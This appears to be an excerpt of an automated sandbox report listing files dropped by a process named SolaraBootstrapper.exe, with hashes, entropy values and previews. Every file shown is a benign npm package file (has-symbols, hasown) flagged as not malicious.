                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/has-symbols.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'].
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):139
                                                  Entropy (8bit):4.461548676043605
                                                  Encrypted:false
                                                  SSDEEP:3:uFx3jG9UDHfa7aBA9c4RIeeFHqpvc9PNUaUifEIkHJ03WhBK:Kw9OfyFdRaB9LUiMIOJHhBK
                                                  MD5:D0104F79F0B4F03BBCD3B287FA04CF8C
                                                  SHA1:54F9D7ADF8943CB07F821435BB269EB4BA40CCC2
                                                  SHA-256:997785C50B0773E5E18BF15550FBF57823C634FEFE623CD37B3C83696402AD0A
                                                  SHA-512:DAF9B5445CFC02397F398ADFA0258F2489B70699DFEC6CA7E5B85AFE5671FDCABE59EDEE332F718F5E5778FEB1E301778DFFE93BB28C1C0914F669659BAD39C6
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):7690
                                                  Entropy (8bit):5.285517314682914
                                                  Encrypted:false
                                                  SSDEEP:96:E5yEtQnY/szbKNRSXwx+Z5cNSQ7FbgXcwujzi3sDpiIRCYxmtUF:EgHGwWRk7zcoIMXCzicDb1mtQ
                                                  MD5:789FF6F17912BF43BBDE1FF15FF2076E
                                                  SHA1:C2B3619116F52CB400AAAA8FFF9B203114886AC2
                                                  SHA-256:B6B4854BAAD1A88E8C338317DC21B1E2C5702C96B9EE38E7A429B53B6D424431
                                                  SHA-512:97F67463F7C36E4E0CD0DA0456C24F511AC1FE333CA0431CDC8AFCFD5218AED72D165922E32CA391FE6D33F6A5840FC214BCC0C8BB348DE187EB018804BF80D2
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v1.0.3](https://github.com/inspect-js/has-symbols/compare/v1.0.2...v1.0.3) - 2022-03-01..### Commits..- [actions] use `node/install` instead of `node/run`; use `codecov` action [`518b28f`](https://github.com/inspect-js/has-symbols/commit/518b28f6c5a516cbccae30794e40aa9f738b1693).- [meta] add `bugs` and `homepage` fields; reorder package.json [`c480b13`](https://github.com/inspect-js/has-symbols/commit/c480b13fd6802b557e1cef9749872cb5fdeef744).- [actions] reuse common workflows [`01d0ee0`](https://github.com/inspect-js/has-symbols/commit/01d0ee0a8d97c0947f5edb73eb722027a77b2b07).- [actions] update codecov uploader [`6424ebe`](https://github.com/inspect-js/has-symbols/commit/6424ebe86b2c9c7c3d2e9bd4413a4e4f168cb275).- [Dev Deps] update
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1071
                                                  Entropy (8bit):5.103097172056218
                                                  Encrypted:false
                                                  SSDEEP:24:SPsrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:ksaJHlxE3dQHOs5exm3ogFh
                                                  MD5:AFEE57A289508ED4DF3456667778AAF6
                                                  SHA1:FF97D906C193A1066D1853D9E4EF458281C8672D
                                                  SHA-256:206C1ADCF206DC0031B11232F5B054EC5F1662407AB1CA415247921CAB2068AB
                                                  SHA-512:7712DB3676F2478282A12D5180679C73241E80EDCD1F58696A0D8AA1D05A0FA705677C9C3E53920AEED5E9657EBE3DCF0B726DA6D7A6EE1EF526E2D84B68B2E0
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) 2016 Jordan Harband..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONN
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2044
                                                  Entropy (8bit):5.0639433319815925
                                                  Encrypted:false
                                                  SSDEEP:48:f1eI4ITUqpRp9bWt8hvVO5ZC7k7k18DOv5EGPIL0IaISv:dXFnpR1P9cDOv50LxDc
                                                  MD5:540771BC2F5479EF889BEE342AE45158
                                                  SHA1:F237D15E79C3F8015193CA4D46A2CEEF631EE9BC
                                                  SHA-256:A062B27EE12E84E310041D05D10D69AC2D7076CBA1FC698BAE8A4E40A15897EC
                                                  SHA-512:2BD925725626F2B22BF054B13C39105522E3DFCCF173E8662196CF56F81BAF8A465E5E7A6E80A417FAE4D87B9063CEEF6C238B33AE79AE822384D85EF0244B8E
                                                  Malicious:false
                                                  Preview:# has-symbols <sup>[![Version Badge][2]][1]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![dependency status][5]][6].[![dev dependency status][7]][8].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][11]][1]..Determine if the JS environment has Symbol support. Supports spec, or shams...## Example..```js.var hasSymbols = require('has-symbols');..hasSymbols() === true; // if the environment has native Symbol support. Not polyfillable, not forgeable...var hasSymbolsKinda = require('has-symbols/shams');.hasSymbolsKinda() === true; // if the environment has a Symbol sham that mostly follows the spec..```..## Supported Symbol shams. - get-own-property-symbols [npm](https://www.npmjs.com/package/get-own-property-symbols) | [github](https://github.com/WebReflection/get-own-property-symbols). - core-js [npm](https://www.npmjs.com/package/core-js) | [github](https://github.com/zloirock/core-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):420
                                                  Entropy (8bit):4.800891424933416
                                                  Encrypted:false
                                                  SSDEEP:12:as0I1hrB8JFQOoZa6OZZa6O5u0O2qeFW2RhDw:as/1NB8LIZTSZTx0rW2Rm
                                                  MD5:1282693C4D8FA15C683C5F633C9108BC
                                                  SHA1:645932A3805F7C0E5715AFDF3018E503F142DC92
                                                  SHA-256:2874F6CF003018E7B47626144B9F7CB2264A8519C71AAAB88562815B2416D3D2
                                                  SHA-512:A9183DD879F013CA4F59EF487FB0873E99DB1E80124F40283861CC44F41E99B6AE33463FFE186286FC1F327EB75B72FD7DB4D3FD21A53210AAE25FE4781EA57C
                                                  Malicious:false
                                                  Preview:'use strict';..var origSymbol = typeof Symbol !== 'undefined' && Symbol;.var hasSymbolSham = require('./shams');..module.exports = function hasNativeSymbols() {..if (typeof origSymbol !== 'function') { return false; }..if (typeof Symbol !== 'function') { return false; }..if (typeof origSymbol('foo') !== 'symbol') { return false; }..if (typeof Symbol('bar') !== 'symbol') { return false; }...return hasSymbolSham();.};.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2648
                                                  Entropy (8bit):5.050751970640803
                                                  Encrypted:false
                                                  SSDEEP:48:Hs9Rp147agO60lGhoRYsEg46P6VNsmN/tDX6q+dqImfSog:KRAg6fhT3iAv/xX6q+d2f4
                                                  MD5:854E83356C304640E79EDEA88870CB14
                                                  SHA1:6D44529B5ED6731668441E5E5F8407263DAB7679
                                                  SHA-256:2DE994869BDA3598116944312CFE5E2383F9CEA9DF05D12B499D704CBE20EC2D
                                                  SHA-512:65AE09EB6BC67A756B4F89BE4636741B9CB555EC7C793F29FE7323FD98EA5B5862F14A5120F286D123DC2C5AF5CF4D8B66C1FA8BCBD11903DAA3D790DD20F0FA
                                                  Malicious:false
                                                  Preview:{.."name": "has-symbols",.."version": "1.0.3",.."description": "Determine if the JS environment has Symbol support. Supports spec, or shams.",.."main": "index.js",.."scripts": {..."prepublishOnly": "safe-publish-latest",..."prepublish": "not-in-publish || npm run prepublishOnly",..."pretest": "npm run --silent lint",..."test": "npm run tests-only",..."posttest": "aud --production",..."tests-only": "npm run test:stock && npm run test:staging && npm run test:shams",..."test:stock": "nyc node test",..."test:staging": "nyc node --harmony --es-staging test",..."test:shams": "npm run --silent test:shams:getownpropertysymbols && npm run --silent test:shams:corejs",..."test:shams:corejs": "nyc node test/shams/core-js.js",..."test:shams:getownpropertysymbols": "nyc node test/shams/get-own-property-symbols.js",..."lint": "eslint --ext=js,mjs .",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git t
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1761
                                                  Entropy (8bit):5.070537386095776
                                                  Encrypted:false
                                                  SSDEEP:48:5F5ZFAZFEBCaAjNXXGbhmjyGbvwZk9cs3iiCcHWK6jB9b:5SrSIMnb
                                                  MD5:D84AA1A07B111DCBE4C4A887E147ED14
                                                  SHA1:2C276EB6E3FCD4EE774E949FD4F9C33ABDE7D6C8
                                                  SHA-256:5BA1A47350DCE55BE2C198C791DF52FA013BAC2AD8D7DCD7D67726C08A4231F1
                                                  SHA-512:172F8E3BFE0BEBDF2BDFB684C8A74B28DA810733F720E0CEA963B99D22E62A7DE85759620ADA2B4282F7946F8744F3388492A0EA95A6254E28241B97C40F9324
                                                  Malicious:false
                                                  Preview:'use strict';../* eslint complexity: [2, 18], max-statements: [2, 33] */.module.exports = function hasSymbols() {..if (typeof Symbol !== 'function' || typeof Object.getOwnPropertySymbols !== 'function') { return false; }..if (typeof Symbol.iterator === 'symbol') { return true; }...var obj = {};..var sym = Symbol('test');..var symObj = Object(sym);..if (typeof sym === 'string') { return false; }...if (Object.prototype.toString.call(sym) !== '[object Symbol]') { return false; }..if (Object.prototype.toString.call(symObj) !== '[object Symbol]') { return false; }...// temp disabled per https://github.com/ljharb/object.assign/issues/17..// if (sym instanceof Symbol) { return false; }..// temp disabled per https://github.com/WebReflection/get-own-property-symbols/issues/4..// if (!(symObj instanceof Symbol)) { return false; }...// if (typeof Symbol.prototype.toString !== 'function') { return false; }..// if (String(sym) !== Symbol.prototype.toString.call(sym)) { return false; }...var symVal
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):4.910385945833464
                                                  Encrypted:false
                                                  SSDEEP:12:jSXFky7xfBX/JBJJigrQzJFm6NrQQQJFmVQESQ0Jw3U0S:jEFky1fBX/JB9czLm6NcQQLmVQESQ0JJ
                                                  MD5:41C0F79988143019F41A2C66AEDFF688
                                                  SHA1:C388D5615B642D2CFFCAE765A5E920A1389DB994
                                                  SHA-256:B2EDDC5A76E6A43738847679126EF698EC8AD36993045207CC1323D1F89710D6
                                                  SHA-512:CD8AAE97D0EC0141BD522573190D7BE71E4960C3315BA5C86FDDD863B87412ACA81DB940A5786DC1D2C5A0940A3FCCA7B37EE5134FBC730F9C6849ACB73215C4
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');.var hasSymbols = require('../');.var runSymbolTests = require('./tests');..test('interface', function (t) {..t.equal(typeof hasSymbols, 'function', 'is a function');..t.equal(typeof hasSymbols(), 'boolean', 'returns a boolean');..t.end();.});..test('Symbols are supported', { skip: !hasSymbols() }, function (t) {..runSymbolTests(t);..t.end();.});..test('Symbols are not supported', { skip: hasSymbols() }, function (t) {..t.equal(typeof Symbol, 'undefined', 'global Symbol is undefined');..t.equal(typeof Object.getOwnPropertySymbols, 'undefined', 'Object.getOwnPropertySymbols does not exist');..t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):723
                                                  Entropy (8bit):4.930198577306373
                                                  Encrypted:false
                                                  SSDEEP:12:jS4eajo9TQv4MkIAZX1FkEQ4LQdJJywRNK090EcXbM+NfJMJQdN/RKHibw:jyaE2v4MBmlFkYLQdlD3aEcY+NfSJQd+
                                                  MD5:DA9C99E70981FFF0BCCEE95D33C7D9A3
                                                  SHA1:B0EDC06CAE4A48128C28B6E567FB730D3E598A40
                                                  SHA-256:79BE6713DD12A209CC17CB866AED4753CA863451247C9262BA69E612D2201CC3
                                                  SHA-512:9EB3C1DE2BB029089A3B522D3A2D144D93D1958E7F11ECE2EACEF1FC3F6166EFFA1841280142355094E67D3E7EB66FEEDEF21B522E13469D37479A92F7F9E675
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..if (typeof Symbol === 'function' && typeof Symbol() === 'symbol') {..test('has native Symbol support', function (t) {...t.equal(typeof Symbol, 'function');...t.equal(typeof Symbol(), 'symbol');...t.end();..});..return;.}..var hasSymbols = require('../../shams');..test('polyfilled Symbols', function (t) {../* eslint-disable global-require */..t.equal(hasSymbols(), false, 'hasSymbols is false before polyfilling');..require('core-js/fn/symbol');..require('core-js/fn/symbol/to-string-tag');...require('../tests')(t);...var hasSymbolsAfter = hasSymbols();..t.equal(hasSymbolsAfter, true, 'hasSymbols is true after polyfilling');../* eslint-enable global-require */..t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):686
                                                  Entropy (8bit):4.913225881075272
                                                  Encrypted:false
                                                  SSDEEP:12:jS4eajo9TQv4MkIAZX1FkEQ4LQdJJywRNsdbM+NfJMJQdN/RKHibw:jyaE2v4MBmlFkYLQdlDs++NfSJQdN/4d
                                                  MD5:35AF75F8D40D693FDC9FBAEEFCE31312
                                                  SHA1:2342D6E47A7220B342249BC039FC9CCD27A1BA9B
                                                  SHA-256:F3B1BCD3C20ABDBD06C21E271BE5870994346F24290B94723B19030A88CDE2B8
                                                  SHA-512:5E6AD1D147651DF35D0C9147BC868DBFF5CB3ADDB387C8EF0E18B6181FEB3CAC448147E85C644FB39D1D0B1AB950D09067C4E8A306F9D70F2A380851E3895BB4
                                                  Malicious:false
                                                  Preview:'use strict';..var test = require('tape');..if (typeof Symbol === 'function' && typeof Symbol() === 'symbol') {..test('has native Symbol support', function (t) {...t.equal(typeof Symbol, 'function');...t.equal(typeof Symbol(), 'symbol');...t.end();..});..return;.}..var hasSymbols = require('../../shams');..test('polyfilled Symbols', function (t) {../* eslint-disable global-require */..t.equal(hasSymbols(), false, 'hasSymbols is false before polyfilling');...require('get-own-property-symbols');...require('../tests')(t);...var hasSymbolsAfter = hasSymbols();..t.equal(hasSymbolsAfter, true, 'hasSymbols is true after polyfilling');../* eslint-enable global-require */..t.end();.});.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2021
                                                  Entropy (8bit):5.021059245522034
                                                  Encrypted:false
                                                  SSDEEP:48:syTZJzHQY0GKLnI9nMxd6efY1e6neg7keHynrnQR:syrHQHGKLnI9Mxd6SY1lnj7kMynrnQR
                                                  MD5:64A006D1CD5458A0E778A44381FE88D4
                                                  SHA1:783E153627BAAB3A43CEEFB4B27A3EAACCF7D5E0
                                                  SHA-256:26968E37F30A1B96F8480D11E06954D467F330FC690124A333E3B2D24934C5C7
                                                  SHA-512:CE3C28B07D51CD3AE38DD9A02C31A53576AF8B5BE237002D662DFCCF85A3D93A2B0C1F5701700C6AEB87D7D6311EC17F680EC4AFE48EBEB282591B35C76AAD0C
                                                  Malicious:false
                                                  Preview:'use strict';..// eslint-disable-next-line consistent-return.module.exports = function runSymbolTests(t) {..t.equal(typeof Symbol, 'function', 'global Symbol is a function');...if (typeof Symbol !== 'function') { return false; }...t.notEqual(Symbol(), Symbol(), 'two symbols are not equal');.../*..t.equal(...Symbol.prototype.toString.call(Symbol('foo')),...Symbol.prototype.toString.call(Symbol('foo')),...'two symbols with the same description stringify the same'..);..*/.../*..var foo = Symbol('foo');...t.notEqual(...String(foo),...String(Symbol('bar')),...'two symbols with different descriptions do not stringify the same'..);..*/...t.equal(typeof Symbol.prototype.toString, 'function', 'Symbol#toString is a function');..// t.equal(String(foo), Symbol.prototype.toString.call(foo), 'Symbol#toString equals String of the same symbol');...t.equal(typeof Object.getOwnPropertySymbols, 'function', 'Object.getOwnPropertySymbols is a function');...var obj = {};..var sym = Symbol('test');..var symO
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):43
                                                  Entropy (8bit):4.231286196905489
                                                  Encrypted:false
                                                  SSDEEP:3:EK8RL0x+Hg:ExL0UA
                                                  MD5:C28B0FE9BE6E306CC2AD30FE00E3DB10
                                                  SHA1:AF79C81BD61C9A937FCA18425DD84CDF8317C8B9
                                                  SHA-256:0694050195FC694C5846B0A2A66B437AC775DA988F0A779C55FB892597F7F641
                                                  SHA-512:E3ECA17804522FFA4F41E836E76E397A310A20E8261A38115B67E8B644444153039D04198FB470F45BE2997D2C7A72B15BD4771A02C741B3CBC072EA6EF432E9
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):552
                                                  Entropy (8bit):4.6003535897442385
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggMGEplgM01bZBgMoGbQjgMy9gMLzgMT:qoQWAg0g+H0mgYplg7g1GegJ9gEzgs
                                                  MD5:FE4BF98C13D8175522E2720C9ECE34D3
                                                  SHA1:E200DD96795DF9E612D66F98CB1BC9D845EA344F
                                                  SHA-256:4A8AADC5BB4E3FCB59CED104864F1440A8A0B82C57D7A69EF3845223590039CC
                                                  SHA-512:454E4459FE6121CB6A92A98D090614797B726E89A364BDFFAB5572FF619A31A7BFE2341E6CCF95E203F93E9A1C6345C9962D800646C8E248389958E0E2A98D6E
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/hasown.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with a single custom sponsorship URL.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.771900676344982
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJHhBK:5O6FTaB9WTpR65U7cAMjJHe
                                                  MD5:C2AB942102236F987048D0D84D73D960
                                                  SHA1:95462172699187AC02EAEC6074024B26E6D71CFF
                                                  SHA-256:948366FEA3B423A46366326D0BB2E54B08ABD1CF0B243678BA6625740C40DA5A
                                                  SHA-512:E36B20C16CEEB090750F3865EFC8D7FD983AE4E8B41C30CC3865D2FD4925BF5902627E1F1ED46C0FF2453F076EF9DE34BE899EF57754B29CD158440071318479
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."test"..].}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):2579
                                                  Entropy (8bit):5.324426385991123
                                                  Encrypted:false
                                                  SSDEEP:48:E5yEpNRtEn2h5YBR6DlPHIb7Gd+kXoNaNWVtGy1Q:E5yEvb7pDlv+7A+kXlUtNQ
                                                  MD5:BDCF700BEA58C1524DC1A503391A47C6
                                                  SHA1:34338CEA11A019FFD5F86739ADF9CC275B310775
                                                  SHA-256:9E4F7FD1854E2DCE08E3587AC7B8B40C191987D6C4FD71E20139D39E80E3E430
                                                  SHA-512:AA4A275D9D136B3478EC644524E7514A17B545017376F5ADA9E93BC46C8D8094B11A32D510D5D2A28B12180E11B2755F60AB0D0756C997F4A01208BFCC75BD05
                                                  Malicious:false
                                                  Preview:# Changelog..All notable changes to this project will be documented in this file...The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html)...## [v2.0.2](https://github.com/inspect-js/hasOwn/compare/v2.0.1...v2.0.2) - 2024-03-10..### Commits..- [types] use shared config [`68e9d4d`](https://github.com/inspect-js/hasOwn/commit/68e9d4dab6facb4f05f02c6baea94a3f2a4e44b2).- [actions] remove redundant finisher; use reusable workflow [`241a68e`](https://github.com/inspect-js/hasOwn/commit/241a68e13ea1fe52bec5ba7f74144befc31fae7b).- [Tests] increase coverage [`4125c0d`](https://github.com/inspect-js/hasOwn/commit/4125c0d6121db56ae30e38346dfb0c000b04f0a7).- [Tests] skip `npm ls` in old node due to TS [`01b9282`](https://github.com/inspect-js/hasOwn/commit/01b92822f9971dea031eafdd14767df41d61c202).- [types] improve predicate type [`d340f85`](https://github.com/inspect-js/hasOwn/commit/d34
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1083
                                                  Entropy (8bit):5.078342100284353
                                                  Encrypted:false
                                                  SSDEEP:24:vlrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:9aJHlxE3dQHOs5exm3ogFh
                                                  MD5:19283EE92F78C91154834571C1F05A94
                                                  SHA1:ACBFF97B52A807A3661247328DC45DF636D7B8F7
                                                  SHA-256:BF9B0D665BE2A689851EEA667CA9F42066EA1D903B38349C51E6A44B2577680A
                                                  SHA-512:22369CC02AF1D2A345A70A415DE9E690F3F14AD6567F216924BF05DCF01DBBDE7C6B3A08CF87D5EDF1CA3B5A793D504E532F3A7C828964E97024334135B57369
                                                  Malicious:false
                                                  Preview:MIT License..Copyright (c) Jordan Harband and contributors..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT O
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1613
                                                  Entropy (8bit):5.067385981569244
                                                  Encrypted:false
                                                  SSDEEP:24:jdn1eI4IjAoqSmPgM1G9S33k74bbJC1r/YAIio/s2ld9ceIJ1heIdsIjvPyv:11eI4I7qLPOZGsVY9IL0IOIWv
                                                  MD5:FEE8DA12ADD9E228E0E81304B4E93FFD
                                                  SHA1:341069A2CCAB6194188C560CC01648E9B550BB69
                                                  SHA-256:A922AB2A0ABCDCBD99C1484C7BD83D69A04B5E11AB53064D2C9AA557DF1C52B4
                                                  SHA-512:05351A85DB9148DCF600385BDA6FEAA1EEEEFF27E9EAF4175914B4C4CCDD1BF23EB9E3DD42E751EE6479127E55EA59A599BF674D3DF0167F1CC8797681EB7842
                                                  Malicious:false
                                                  Preview:# hasown <sup>[![Version Badge][npm-version-svg]][package-url]</sup>..[![github actions][actions-image]][actions-url].[![coverage][codecov-image]][codecov-url].[![License][license-image]][license-url].[![Downloads][downloads-image]][downloads-url]..[![npm badge][npm-badge-png]][package-url]..A robust, ES3 compatible, "has own property" predicate...## Example..```js.const assert = require('assert');.const hasOwn = require('hasown');..assert.equal(hasOwn({}, 'toString'), false);.assert.equal(hasOwn([], 'length'), true);.assert.equal(hasOwn({ a: 42 }, 'a'), true);.```..## Tests.Simply clone the repo, `npm install`, and run `npm test`..[package-url]: https://npmjs.org/package/hasown.[npm-version-svg]: https://versionbadg.es/inspect-js/hasown.svg.[deps-svg]: https://david-dm.org/inspect-js/hasOwn.svg.[deps-url]: https://david-dm.org/inspect-js/hasOwn.[dev-deps-svg]: https://david-dm.org/inspect-js/hasOwn/dev-status.svg.[dev-deps-url]: https://david-dm.org/inspect-js/hasOwn#info=devDependenc
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):117
                                                  Entropy (8bit):4.674932235191531
                                                  Encrypted:false
                                                  SSDEEP:3:nPXTLQxdRALbMa5bWySDqTAd/uJfVKBi0Wq4w:bvLAa5nGq1VQiyj
                                                  MD5:D479F40517E58A21B3E6BE1D00315536
                                                  SHA1:4A613A88E7DE9852BCCD927113424452BAFA9F69
                                                  SHA-256:19BCD679CC9CB312683BF10390A1AADB929AF6439B33EB60F06119EE2D702761
                                                  SHA-512:82DFB875AF75B81793214D56A3FB5DE844B792A7FCCDDCBD1AFF424062E6DE03075974110A86EB7EC66EC4CDB8C4DD87123847CD8381F69A0C117AC6F5B7E25F
                                                  Malicious:false
                                                  Preview:declare function hasOwn<O, K extends PropertyKey, V = unknown>(o: O, p: K): o is O & Record<K, V>;..export = hasOwn;.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):206
                                                  Entropy (8bit):4.963435694280913
                                                  Encrypted:false
                                                  SSDEEP:6:QibKXKHqL37T5KHqLWt8Zs3VZqdq0f3rVWKfzB0LTtTpFFj:3KXV3fIQvszapf3vfzBSTxj
                                                  MD5:58E3B71AE6D84D4371DD90900B2B7F01
                                                  SHA1:668857F7A7F36A0F7B80C8B6992B543819CE3A82
                                                  SHA-256:8F875520F41A3D711566013882AF290C840969316CC72CD6B35F7E81D7DFC6D2
                                                  SHA-512:EB7604A0E466510225596E59B1E208AD02117EBFD5EB5A933462E3A65365CA255E43EB803C405F266A3C56938C3D25F2E86A393DB3115BFB626E3DD93E1EB150
                                                  Malicious:false
                                                  Preview:'use strict';..var call = Function.prototype.call;.var $hasOwn = Object.prototype.hasOwnProperty;.var bind = require('function-bind');../** @type {import('.')} */.module.exports = bind.call(call, $hasOwn);.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):2283
                                                  Entropy (8bit):5.113052557902681
                                                  Encrypted:false
                                                  SSDEEP:48:TukRYCgxUPagS4j0f+yRYsEg4ZYx2Tw234sz4PvC4dmeSowVH:YCgq4s3ZYx2Tw23424Oe6H
                                                  MD5:E1B6E64CEA1F71881FABB0759BAC0D43
                                                  SHA1:2AAB9E964E19EDF340C8E8978D9BD7EACD6BFC4E
                                                  SHA-256:E96D24E4DCEC86A4F769F41174B1CC79F70B4AB77B83AAC4DFE646242BF76ABB
                                                  SHA-512:AE04DB7B3F1A5DD292F2B064B5D5E8265ED2C9D82FBB1FCE88393D983D5C2BA6743F7FA087E7DDFD1A8F14C8D518CB64A93193D5EDC4A1C15475834A3C1DC630
                                                  Malicious:false
                                                  Preview:{.."name": "hasown",.."version": "2.0.2",.."description": "A robust, ES3 compatible, \"has own property\" predicate.",.."main": "index.js",.."exports": {...".": "./index.js",..."./package.json": "./package.json"..},.."types": "index.d.ts",.."sideEffects": false,.."scripts": {..."prepack": "npmignore --auto --commentLines=autogenerated",..."prepublish": "not-in-publish || npm run prepublishOnly",..."prepublishOnly": "safe-publish-latest",..."prelint": "evalmd README.md",..."lint": "eslint --ext=js,mjs .",..."postlint": "npm run tsc",..."pretest": "npm run lint",..."tsc": "tsc -p .",..."posttsc": "attw -P",..."tests-only": "nyc tape 'test/**/*.js'",..."test": "npm run tests-only",..."posttest": "aud --production",..."version": "auto-changelog && git add CHANGELOG.md",..."postversion": "auto-changelog && git add CHANGELOG.md && git commit --no-edit --amend && git tag -f \"v$(node -e \"console.log(require('./package.json').version)\")\""..},.."repository": {..."type": "git",..."url": "git+
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
